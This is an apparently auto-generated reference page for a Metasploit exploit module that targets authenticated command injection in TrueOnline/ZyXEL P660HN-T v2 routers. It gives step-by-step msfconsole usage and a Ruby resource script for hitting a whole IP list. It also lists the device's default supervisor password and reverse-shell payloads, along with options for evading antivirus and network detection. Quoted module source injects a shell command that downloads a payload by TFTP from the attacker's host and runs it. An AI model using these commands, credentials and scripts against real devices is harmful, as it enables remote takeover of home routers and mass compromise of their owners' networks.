TrueOnline / ZyXEL P660HN-T v2 Router Authenticated Command Injection - Metasploit


This page contains detailed information about how to use the exploit/linux/http/trueonline_p660hn_v2_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: TrueOnline / ZyXEL P660HN-T v2 Router Authenticated Command Injection
Module: exploit/linux/http/trueonline_p660hn_v2_rce
Source code: modules/exploits/linux/http/trueonline_p660hn_v2_rce.rb
Disclosure date: 2016-12-26
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): mipsbe
Supported platform(s): Linux
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2017-18370, CVE-2017-18371

TrueOnline is a major ISP in Thailand, and it distributes a customized version of the ZyXEL P660HN-T v2 router. This customized version has an authenticated command injection vulnerability in the remote log forwarding page. This can be exploited using the "supervisor" account that comes with a default password on the device. This module was tested in an emulated environment, as the author doesn't have access to the Thai router any more. Any feedback should be sent directly to the module's author, as well as to the Metasploit project. Note that the inline payloads work best. There are Turkish and other language strings in the firmware, so it is likely that this firmware is not only distributed in Thailand. Other P660HN-T v2 in other countries might be vulnerable too.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using trueonline_p660hn_v2_rce against a single host

Normally, you can use exploit/linux/http/trueonline_p660hn_v2_rce this way:

msf > use exploit/linux/http/trueonline_p660hn_v2_rce
msf exploit(trueonline_p660hn_v2_rce) > show targets
    ... a list of targets ...
msf exploit(trueonline_p660hn_v2_rce) > set TARGET target-id
msf exploit(trueonline_p660hn_v2_rce) > show options
    ... show and set options ...
msf exploit(trueonline_p660hn_v2_rce) > exploit

Using trueonline_p660hn_v2_rce against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your trueonline_p660hn_v2_rce will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/http/trueonline_p660hn_v2_rce")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • LHOST: The listen IP address from where the victim downloads the MIPS payload

Go back to menu.

Msfconsole Usage


Here is how the linux/http/trueonline_p660hn_v2_rce exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/trueonline_p660hn_v2_rce

[*] Using configured payload linux/mipsbe/shell_reverse_tcp
msf6 exploit(linux/http/trueonline_p660hn_v2_rce) > show info

       Name: TrueOnline / ZyXEL P660HN-T v2 Router Authenticated Command Injection
     Module: exploit/linux/http/trueonline_p660hn_v2_rce
   Platform: Linux
       Arch: mipsbe
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-12-26

Provided by:
  Pedro Ribeiro <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   P660HN-T v2

Check supported:
  Yes

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  DELAY     30               yes       How long to wait for the device to download the payload
  LHOST                      yes       The listen IP address from where the victim downloads the MIPS payload
  PASSWORD  zyad1234         yes       Password for the web interface (using default credentials)
  Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     80               yes       The target port (TCP)
  SSL       false            no        Negotiate SSL/TLS for outgoing connections
  USERNAME  supervisor       yes       Username for the web interface (using default credentials)
  VHOST                      no        HTTP server virtual host

Payload information:

Description:
  TrueOnline is a major ISP in Thailand, and it distributes a 
  customized version of the ZyXEL P660HN-T v2 router. This customized 
  version has an authenticated command injection vulnerability in the 
  remote log forwarding page. This can be exploited using the 
  "supervisor" account that comes with a default password on the 
  device. This module was tested in an emulated environment, as the 
  author doesn't have access to the Thai router any more. Any feedback 
  should be sent directly to the module's author, as well as to the 
  Metasploit project. Note that the inline payloads work best. There 
  are Turkish and other language strings in the firmware, so it is 
  likely that this firmware is not only distributed in Thailand. Other 
  P660HN-T v2 in other countries might be vulnerable too.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2017-18370
  https://nvd.nist.gov/vuln/detail/CVE-2017-18371
  https://seclists.org/fulldisclosure/2017/Jan/40
  https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt
  https://blogs.securiteam.com/index.php/archives/2910

Module Options


This is a complete list of options available in the linux/http/trueonline_p660hn_v2_rce exploit:

msf6 exploit(linux/http/trueonline_p660hn_v2_rce) > show options

Module options (exploit/linux/http/trueonline_p660hn_v2_rce):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DELAY     30               yes       How long to wait for the device to download the payload
   LHOST                      yes       The listen IP address from where the victim downloads the MIPS payload
   PASSWORD  zyad1234         yes       Password for the web interface (using default credentials)
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     80               yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME  supervisor       yes       Username for the web interface (using default credentials)
   VHOST                      no        HTTP server virtual host

Payload options (linux/mipsbe/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   P660HN-T v2

Advanced Options


Here is a complete list of advanced options supported by the linux/http/trueonline_p660hn_v2_rce exploit:

msf6 exploit(linux/http/trueonline_p660hn_v2_rce) > show advanced

Module advanced options (exploit/linux/http/trueonline_p660hn_v2_rce):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EXE::Custom                                                                 no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false                                               no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                                               no        Use the default template in case the specified one is missing
   EXE::Inject             false                                               no        Set to preserve the original EXE function
   EXE::OldMethod          false                                               no        Set to use the substitution EXE generation method.
   EXE::Path                                                                   no        The directory in which to look for the executable template
   EXE::Template                                                               no        The executable template file name.
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   MSI::Custom                                                                 no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false                                               no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                                   no        The directory in which to look for the msi template
   MSI::Template                                                               no        The msi template file name
   MSI::UAC                false                                               no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (linux/mipsbe/shell_reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AppendExit                  false            no        Append a stub that executes the exit(0) system call
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel       0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PrependChrootBreak          false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                 false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid               false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid             false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid            false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid            false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid             false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid               false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                   no        Redirect Debug Info to a Log File
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/trueonline_p660hn_v2_rce module can exploit:

msf6 exploit(linux/http/trueonline_p660hn_v2_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   P660HN-T v2

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/trueonline_p660hn_v2_rce exploit:

msf6 exploit(linux/http/trueonline_p660hn_v2_rce) > show payloads

Compatible Payloads
===================

   #   Name                                            Disclosure Date  Rank    Check  Description
   -   ----                                            ---------------  ----    -----  -----------
   0   payload/generic/custom                                           normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                   normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                                normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/linux/mipsbe/exec                                        normal  No     Linux Execute Command
   4   payload/linux/mipsbe/meterpreter/reverse_tcp                     normal  No     Linux Meterpreter, Reverse TCP Stager
   5   payload/linux/mipsbe/meterpreter_reverse_http                    normal  No     Linux Meterpreter, Reverse HTTP Inline
   6   payload/linux/mipsbe/meterpreter_reverse_https                   normal  No     Linux Meterpreter, Reverse HTTPS Inline
   7   payload/linux/mipsbe/meterpreter_reverse_tcp                     normal  No     Linux Meterpreter, Reverse TCP Inline
   8   payload/linux/mipsbe/reboot                                      normal  No     Linux Reboot
   9   payload/linux/mipsbe/shell/reverse_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   10  payload/linux/mipsbe/shell_bind_tcp                              normal  No     Linux Command Shell, Bind TCP Inline
   11  payload/linux/mipsbe/shell_reverse_tcp                           normal  No     Linux Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/trueonline_p660hn_v2_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/trueonline_p660hn_v2_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PEER> - Failed to authenticate to the web interface.


Here is a relevant code snippet related to the "<PEER> - Failed to authenticate to the web interface." error message:

109:	    })
110:	
111:	    if res && res.code == 200
112:	      print_good("#{peer} - Successfully authenticated to the web interface.")
113:	    else
114:	      fail_with(Failure::Unknown, "#{peer} - Failed to authenticate to the web interface.")
115:	    end
116:	
117:	    #this filename is used to store the payload on the device -> the fewer chars the better!
118:	    filename = rand_text_alpha_lower(5)
119:	

<PEER> - Failed to inject payload.


Here is a relevant code snippet related to the "<PEER> - Failed to inject payload." error message:

123:	cd /tmp;tftp -g -r #{filename} #{datastore['LHOST']};chmod +x /tmp/#{filename};sleep 5;/tmp/#{filename} &}
124:	
125:	    counter = 10
126:	    res = send_cmd("echo -n \"#{script_file[0..counter]}\">#{exec_file}")
127:	    if not res
128:	      fail_with(Failure::Unknown, "#{peer} - Failed to inject payload.")
129:	    end
130:	
131:	    while counter+1 < script_file.length
132:	      if (counter + 10) > script_file.length
133:	        ending = script_file.length - 1

<PEER> - Failed to inject payload.


Here is a relevant code snippet related to the "<PEER> - Failed to inject payload." error message:

138:	      print_good("#{peer} - Successfully injected part of the payload, waiting 5 seconds before proceeding.")
139:	      sleep 5
140:	
141:	      send_cmd("echo -n \"#{script_file[counter+1..ending]}\">>#{exec_file}")
142:	      if not res
143:	        fail_with(Failure::Unknown, "#{peer} - Failed to inject payload.")
144:	      end
145:	
146:	      counter += (ending - counter)
147:	    end
148:	

<PEER> - Target didn't request request the ELF payload -- Maybe it cant connect back to us?


Here is a relevant code snippet related to the "<PEER> - Target didn't request request the ELF payload -- Maybe it cant connect back to us?" error message:

181:	    while (not @tftp.files.length == 0)
182:	      select(nil, nil, nil, 1)
183:	      waited += 1
184:	      if (waited > datastore['DELAY'])
185:	        @tftp.stop
186:	        fail_with(Failure::Unknown, "#{peer} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
187:	      end
188:	    end
189:	    print_good("#{peer} - Payload was downloaded, wait for shell!")
190:	  end
191:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.